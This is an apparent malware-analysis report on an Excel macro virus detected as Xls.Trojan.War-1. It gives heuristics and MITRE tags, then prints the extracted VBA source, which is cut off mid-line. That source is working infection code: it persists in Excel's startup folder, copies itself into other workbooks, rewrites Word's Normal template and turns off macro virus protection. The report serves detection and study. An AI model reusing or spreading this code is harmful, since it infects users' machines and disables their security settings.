MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
This Excel file contains VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The script attempts to save a copy of itself to the user's startup directory as 'ALEVIRUSCS.XLM', indicating an attempt to establish persistence. The ClamAV detection 'Xls.Trojan.War-1' further supports its malicious nature.
Heuristics 7
-
ClamAV: Xls.Trojan.War-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.War-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12315 bytes |
SHA-256: f75a9e7a798b531d18a6f4305d8807d329027c4bfed4e70fed9fb08b8a41141a |
|||
|
Detection
ClamAV:
Xls.Trojan.War-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = 0
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 5, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 6, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 7, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 8, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 9, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 10, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 11, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 12, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 13, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 14, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 15, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.